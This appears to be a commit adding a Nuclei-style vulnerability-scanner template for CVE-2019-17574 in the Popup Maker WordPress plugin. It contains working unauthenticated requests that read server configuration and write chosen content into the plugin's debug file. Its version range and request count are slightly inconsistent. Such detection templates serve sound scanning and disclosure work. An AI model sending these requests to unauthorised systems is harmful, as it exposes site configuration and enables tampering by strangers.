Create CVE-2019-17574.yaml

http/cves/2019/CVE-2019-17574.yaml

@@ -0,0 +1,48 @@
+id: CVE-2019-17574
+
+info:
+  name: Popup-Maker < 1.8.12 - Webserver Configuration Disclosure
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file").
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-17574
+    - https://wpscan.com/vulnerability/9907
+    - https://web.archive.org/web/20191128065954/https://blog.redyops.com/wordpress-plugin-popup-maker/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cwe-id: CWE-639
+  metadata:
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/popup-maker/"
+    verified: true
+  tags: cve,cve2019,wp,wordpress,wp-plugin,disclosure,popup-maker
+
+http:
+  - raw:
+      - |
+        GET /?pum_action=tools_page_tab_system_info HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        popmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_1
+        words:
+          - 'Popup Maker Configuration'
+          - 'Webserver Configuration'
+        condition: and
+
+      - type: word
+        part: body_2
+        words:
+          - 'CVE-2019-17574'